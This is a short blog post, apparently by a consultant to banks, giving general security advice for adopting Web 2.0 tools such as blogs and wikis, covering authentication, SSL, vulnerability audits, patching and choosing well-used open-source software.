As many of you already know, I’ve been speaking to bankers across the country about the web, especially the new technologies coming out of the Web 2.0 movement and how those technologies can help financial institutions connect better, via the Web, with their customers. It has been a lot of fun discussing the possibilities and some our clients are beginning to try out and even implement some of these technologies. But one topic that keeps coming back as a question are the security issues related to things like blogs, podcasts, and wiki’s. Lots of people show interest in trying these technologies but lose their desire when fears of security and privacy start being discussed.
I definitely believe in the power of these technologies to engage your customers in new ways and also to collaborate more productively with your internal staff but security definitely needs to be addressed when implementing them. Let me try to briefly breakdown some of the things you need to consider:
Strong Authentication is still key.
For most of these technologies, strong authentication has to be a staple. As always, we recommend to use complex passwords and should probably change the passwords at least every 45-60 days but let the exposure of accessing that data be your guide on how frequent.
For sensitive information, SSL is essential.
We utilize a project management system for all our communication with our clients and we paid more to ensure all pages were properly encrypted and secured from outside access. If it’s just a blog that only has standard public information on it, I wouldn’t worry about it but if it is something like an externally accessible wiki for your FIs employees, secure it!
Test these web services for vulnerabilities.
Companies are now doing web-site audits and can test for site to see if its susceptible to different types of attacks (website defacement, SQL injections, phishing, cross-site scripting, etc.) Also, Web 2.0 uses quite a bit of AJAX for there services and these have been proven to be a vector of attack.
You still gotta patch!
If you are utilizing any web services that are downloaded from the Web make sure to stay on top of the latest revisions for any possible improvements to the security of the application. And I would recommended if going open source (which we’re a big fan of) to use software that is being used by the masses, not just a project that is managed by one developer.
Again, you don’t necessarily need all of these depending on your use case but in the event of sensitive data being transferred, it becomes more necessary. Do a risk assessment to find out!
:)
